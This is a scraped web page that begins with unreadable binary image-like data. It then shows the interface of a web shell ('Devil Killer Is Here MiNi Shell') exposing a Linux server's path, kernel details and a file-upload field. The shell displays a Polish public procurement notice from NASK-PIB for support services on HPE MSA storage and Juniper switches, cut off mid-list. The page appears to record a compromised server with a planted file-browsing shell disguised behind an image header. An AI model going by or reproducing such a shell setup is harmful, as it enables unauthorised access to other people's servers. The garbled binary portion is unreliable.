JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230504/0020185801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Przedłużenie usług wsparcia na posiadane przez Zamawiającego urządzenia HPE MSA oraz na urządzenia Juniper EX3300, EX3400, EX4200, EX4300 (2 Części)” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NAUKOWA I AKADEMICKA SIEĆ KOMPUTEROWA - PAŃSTWOWY INSTYTUT BADAWCZY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010464542</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kolska 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-045</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@nask.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.nask.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> telekomunikacja/IT </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przedłużenie usług wsparcia na posiadane przez Zamawiającego urządzenia HPE MSA oraz na urządzenia Juniper EX3300, EX3400, EX4200, EX4300 (2 Części)” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6bef7374-df47-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00201858</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.nask.pl/bip/zamowienia-publiczne <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://nask.eb2b.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający określa niezbędne<br/>wymagania sprzętowo - aplikacyjne umożliwiające pracę naPlatformietj.:1) Stały dostęp do sieci Internet o gwarantowanej<br/>przepustowości nie mniejszej niż 512kb/s;2)Komputer klasy PC lub MAC, o następującej minimalnej konfiguracji: pamięć 2GB RAM,<br/>procesor IntelIV 2GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux;3)Zainstalowana dowolna<br/>przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja10.0;4) Włączona obsługa JavaScript;5) Zainstalowany<br/>program AcrobatReader lub inny odczytujący pliki w formacie np.pdf, .doc, .docx, .xls, .xlsx.6) dopuszczalna wielkość przesyłanych<br/>pojedynczych plików do 50MB.Dokumenty w formacie ,,PDF” zaleca się podpisywać formatem PAdES; natomiast dokumenty w<br/>formacie innym niż ,,PDF” zaleca się podpisywać formatem XAdES. Zamawiający określa informacje na temat kodowania i czasu<br/>odbioru danych:1) Plik załączony przez Wykonawcę na Platformie i zapisany, nie jest widoczny dla Zamawiającego oraz właściciela<br/>Platformy, gdyż istnieje w systemie jako zaszyfrowany. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływie terminu składania ofert.2) Oznaczenie czasu odbioru danych przez Platformę stanowi przypiętą do<br/>dokumentu elektronicznego datę oraz dokładny czas(hh:mm:ss),znajdującą się po lewej stronie dokumentu w kolumnie „Data<br/>przesłania”. Zamawiający kieruje ew. wezwania/pisma do Wykonawcy za pośrednictwem Platformy w zakładce „Pytania/Informacje”.<br/>Docelowy plik skierowany do Wykonawcy widoczny będzie w podzakładce „Otrzymane”. Dokumenty składane na wezwanie<br/>Zamawiającego, Wykonawca wczytuje<br/>w oryginale lub kopii poświadczonej za zgodność z oryginałem opatrzone kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym na Platformie w zakładce „Pytania/Informacje (podzakładka „Dodaj<br/>pytanie/komentarz”). Wykonawca w niniejszej podzakładce<br/>wybiera docelowy plik, który ma zostać wczytany. Po wczytaniu pliku wybiera opcję „Zapisz”. Wykonawca składa ofertę poprzez<br/>dodanie w zakładce „Załączniki” dokumentów (załączników) określonych w niniejszej SWZ i podpisanych kwalifikowanym podpisem<br/>elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym poprzez wybranie polecenia „Dodaj załącznik” i wybranie<br/>docelowego pliku, który ma zostać zamieszczony. Wykonawca winien opisać załącznik nazwą umożliwiającą jego identyfikację. W<br/>przypadku, gdy załącznik zwiera tajemnicę przedsiębiorstwa/dane<br/>osobowe Wykonawca zaznacza stosowne polecenie „Załącznik stanowiący tajemnicę<br/>przedsiębiorstwa”<br/>/ „Załącznik zawiera daneosobowe”,2)Potwierdzeniem prawidłowo złożonej oferty (dodania załącznika)<br/>jest automatyczne wy generowanie komunikatu systemowego o treści „Plik został przesłany”, po każdej<br/>prawidłowo wykonanej operacji tj. dodaniu i zapisaniu załącznika.3) O terminie złożenia oferty decyduje<br/>czas pełnego przeprocesowania transakcji na Platformie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, na podstawie art. 13 oraz art.14<br/>Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 roku w<br/>sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE<br/>(RODO),że:1)Administratorem przekazanych przez Państwa danych osobowych jest Zamawiający. 2)<br/>NASK -PIB wyznaczył inspektora ochrony danych osobowych, z którym można skontaktować się<br/>poprzez email inspektorochronydanych@nask.pl; 3) Państwa dane osobowe będą przetwarzane na<br/>podstawie art.6ust. 1 lit. c RODO, w celu związanym z postępowaniem o udzielenie<br/>zamówieniapublicznego;4)Państwa dane osobowe mogą być przekazywane organom państwowym,<br/>bankom, operatorom pocztowym, podmiotom świadczącym dla Administratora usługi prawne,<br/>doradcze, podatkowe oraz podmiotom obsługującym systemy teleinformatyczne oraz innym<br/>podmiotom uprawnionym na mocy ustawy Prawo zamówień publicznych (art. 74) przez określony czas<br/>(art. 78);5)Dane osobowe przechowywane są przez Administratora dla celów archiwizacyjnych,<br/>zgodnie z wewnętrznymi ustaleniami, jak również do czasu przedawnienia ewentualnych roszczeń lub<br/>obrony przez ewentualnymi roszczeniami;6) Posiadają Państwo prawo dostępu do treści swoich<br/>danych osobowych oraz prawo ich sprostowania, usunięcia, ograniczenia przetwarzania, prawo<br/>do przenoszenia danych, prawo wniesienia sprzeciwu z zastrzeżeniem, że: a) Skorzystanie przez<br/>osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art.16<br/>rozporządzenia2016/679, nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia ani zmianą wzory umowy w sprawie zamówienia publicznego w zakresie<br/>niezgodnym z ustawą; b) W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia<br/>przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania<br/>danych osobowych do czasu zakończenia tego postępowania; c) Zamawiający udostępnia dane osobowe, o których mowa wart. 10<br/>rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z<br/>dnia 27kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych iw sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE<br/>(ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 4.05.2016, str. 1, z późn. zm.)),<br/>zwanego dalej „rozporządzeniem 2016/679”, w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w SWZ, do upływu terminu na ich wniesienie,7) W przypadku stwierdzenia,<br/>że przetwarzanie Państwa danych osobowych narusza przepisy RODO, przysługuje Państwu prawo<br/>do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych,8) Podanie danych osobowych jest dobrowolne, ale<br/>konieczne dla celów związanych z postępowaniem o udzielenie<br/>zamówienia,9)Decyzje dotyczące przetwarzania danych osobowych nie będą podejmowane w<br/>sposób zautomatyzowany. Administrator nie profiluje danych osobowych,10) Państwa dane osobowe<br/>nie będą przekazywane poza terytorium Europejskiego Obszaru Gospodarczego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZZPiZ.2610.7.2023.178.PKO</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	W zakresie Części 1: Przedmiotem zamówienia jest przedłużenie usług wsparcia umowy serwisowej nr: L6P1526C indentyfikator kontraktu: 108681764058, wskazanych w tabeli, o której mowa w Rozdziale III ust.3 SWZ tj. dla urządzeń oraz usługi, o których mowa poniżej:<br/>1) HPE MSA 2040 ES SAN DC SFF Storage, Nr ser.: 2S6614B118, Numer produktu: K2R80A<br/>2) J9F49A HP MSA 1.8TB 12G SAS 10K 2.5in 512e HDD CZ3624ZDYQ<br/>J9F49A HP MSA 1.8TB 12G SAS 10K 2.5in 512e HDD CZ3624ZDYP<br/>J9F49A HP MSA 1.8TB 12G SAS 10K 2.5in 512e HDD CZ3624ZDYN<br/>J9F49A HP MSA 1.8TB 12G SAS 10K 2.5in 512e HDD CZ3624ZDWJ<br/>J9F49A HP MSA 1.8TB 12G SAS 10K 2.5in 512e HDD CZ3624ZDWH<br/>J9F49A HP MSA 1.8TB 12G SAS 10K 2.5in 512e HDD CZ3624ZDWG<br/>J9F49A HP MSA 1.8TB 12G SAS 10K 2.5in 512e HDD CZ3624ZDWF<br/>J9F49A HP MSA 1.8TB 12G SAS 10K 2.5in 512e HDD CZ3624ZDWD<br/>J9F49A HP MSA 1.8TB 12G SAS 10K 2.5in 512e HDD CZ3624ZDWB<br/>J9F49A HP MSA 1.8TB 12G SAS 10K 2.5in 512e HDD 2EHMD01F3148A0<br/>N9X96A HPE MSA 800GB 12G SAS MU 2.5in SSD KR2620J04X<br/>N9X96A HPE MSA 800GB 12G SAS MU 2.5in SSD KR2620J04W<br/>N9X96A HPE MSA 800GB 12G SAS MU 2.5in SSD KR2620J04U <br/>N9X96A HPE MSA 800GB 12G SAS MU 2.5in SSD KR2620J04T<br/>N9X96A HPE MSA 800GB 12G SAS MU 2.5in SSD KR2620J04S<br/>N9X96A HPE MSA 800GB 12G SAS MU 2.5in SSD KR2620J04R<br/>N9X96A HPE MSA 800GB 12G SAS MU 2.5in SSD KR2620J04P<br/>N9X96A HPE MSA 800GB 12G SAS MU 2.5in SSD KR2620J04N<br/>N9X96A HPE MSA 800GB 12G SAS MU 2.5in SSD KR2620J04M<br/>N9X96A HPE MSA 800GB 12G SAS MU 2.5in SSD KR2620J04L<br/>N9X96A HPE MSA 800GB 12G SAS MU 2.5in SSD KR1605J03U<br/>N9X96A HPE MSA 800GB 12G SAS MU 2.5in SSD KR1605J03T<br/>C8R23A HP MSA 2040 8Gb SW FC SFP 4 Pk MY861302KL<br/>C8R23A HP MSA 2040 8Gb SW FC SFP 4 Pk MY861301F4<br/><br/><br/>3) HPE MSA 2040 ES LFF Disk Enclosure, Nr ser.: 2S6614D008<br/>4) J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z0BH<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z0BA<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z0B3<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z0B2<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z09E<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z09D<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z09C<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z093<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z0BI<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z0BU<br/><br/>5) HPE MSA 2040 ES LFF Disk Enclosure, Nr ser.: 2S6614D010<br/>6) J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z0AP<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z09M<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z09N<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z09U<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z09V<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z0AZ<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z0AR<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z0A4<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z0A5<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z0AE<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z0AF<br/>7) HPE MSA 2040 ES LFF Disk Enclosure, Nr ser.: 2S6614D006<br/>8) J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z09A<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z0B5<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z0BK<br/>J9F43A HPE MSA 6TB 12G SAS 7.2K 3.5in MDL HDD 2C7619Z0BX<br/><br/><br/>oraz usługi: D4T79AAE HP MSA 2040Pref Auto Tiering E-LTU.<br/>2.Szczegółowy opis przedmiotu zamówienia (zwany jako SOPZ) zawarty jest w Załączniku nr 1a do SWZ dla Części 1.<br/>3. Termin realizacji zamówienia w zakresie Części 1: Realizacja przedmiotu zamówienia nastąpi w terminie 10 miesięcy, licząc od dat rozpoczęcia świadczenia usług wskazanych w ust.3 w tabeli dla Części 1. Wykonawca zobowiązany jest w terminie 5 dni kalendarzowych, liczonych od dnia zawarcia umowy umożliwić Zamawiającemu dostęp do tych usług. Daty rozpoczęcia i daty zakończenia realizacji poszczególnych usług zostały określone w kolumnie nr 2 i 3 tabeli znajdującej się w Rozdziale III ust. 3 SWZ .<br/>4. W przypadkach, kiedy w szczegółowym opisie przedmiotu zamówienia wskazane zostały znaki towarowe, patenty, pochodzenie, źródło lub szczególny proces, który charakteryzuje produkty lub usługi dostarczane przez konkretnego Wykonawcę co prowadziłoby do uprzywilejowania lub wyeliminowania niektórych wykonawców lub produktów, oznacza to, że Zamawiający nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń i jest to uzasadnione specyfiką przedmiotu zamówienia. W takich sytuacjach ewentualne wskazania na znaki towarowe, patenty, pochodzenie, źródło lub szczególny proces, należy odczytywać z wyrazami „lub równoważne”.<br/>5.	W przypadku, gdy w opisie przedmiotu zamówienia zostały zastosowane odniesienia do norm, ocen technicznych, specyfikacji technicznych i systemów referencyjnych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 ustawy Pzp, Zamawiający zgodnie z art. 101 ust. 4 ustawy Pzp dopuszcza zastosowanie rozwiązań równoważnych. Każdorazowo gdy wskazana jest w niniejszej SWZ norma, ocena techniczna, specyfikacja techniczna lub system referencji technicznych należy przyjąć, że w odniesieniu do nich użyto sformułowania „lub równoważne”.<br/>6.	Wykonawca, który powołuje się na rozwiązania równoważne opisywane przez Zamawiającego, jest obowiązany udowodnić w ofercie, w szczególności za pomocą przedmiotowych środków dowodowych, o których mowa w art. 104-107 ustawy Pzp, że proponowane przez niego rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia. Dowody, w szczególności przedmiotowe środki dowodowe, o których mowa w art. 104-107 ustawy Pzp, potwierdzające, że proponowane przez Wykonawcę rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia nie podlegają uzupełnieniu.<br/>7.	Zamawiający nie dopuszcza możliwości prowadzenia negocjacji w celu ulepszenia treści ofert złożonych w odpowiedzi na ogłoszenie o zamówieniu.<br/>8. Zamawiający nie przewiduje możliwości udzielenia zamówienia, o którym mowa w art. 305 pkt 1) w zw. z art. 214 ust. 1 pkt 7) ustawy Pzp.<br/>9.	Zamawiający w zakresie Części 1 nie przewiduje wymagań w zakresie zatrudnienia osób, o których mowa w art. 95 ust. 1 ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72253200-5 - Usługi w zakresie wsparcia systemu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72250000-2 - Usługi w zakresie konserwacji i wsparcia systemów</p> <p class="mb-0">71356300-1 - Usługi wsparcia technicznego</p> <p class="mb-0">72611000-6 - Usługi w zakresie wsparcia technicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokonując wyboru najkorzystniejszej oferty spośród ofert niepodlegających odrzuceniu, złożonych w odpowiedzi na ogłoszenie o zamówieniu, będzie kierował się kryterium i jego znaczeniem oraz będzie oceniał oferty w ramach kryterium oceny ofert. Zamawiający udzieli zamówienia Wykonawcy, którego Oferta uzyska najwyższą liczbę punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.W zakresie Części 2: Przedmiotem zamówienia jest zapewnienie wsparcia technicznego dla posiadanych przez Zamawiającego przełączników sieciowych firmy Juniper, zwanych dalej „Urządzeniami”.<br/>2. Lista Urządzeń objętych przedmiotem zamówienia w zakresie Części 2 obejmuje Urządzenia Producenta Jupiter, o których mowa w tabeli znajdującej się w Rozdziale III ust. 5 SWZ tj.:<br/>1) Grupa 1: EX4200-24T – liczba sztuk 10, lokalizacja Warszawa, <br/>2) Grupa 2: EX3300-48P – liczba sztuk 10, lokalizacja 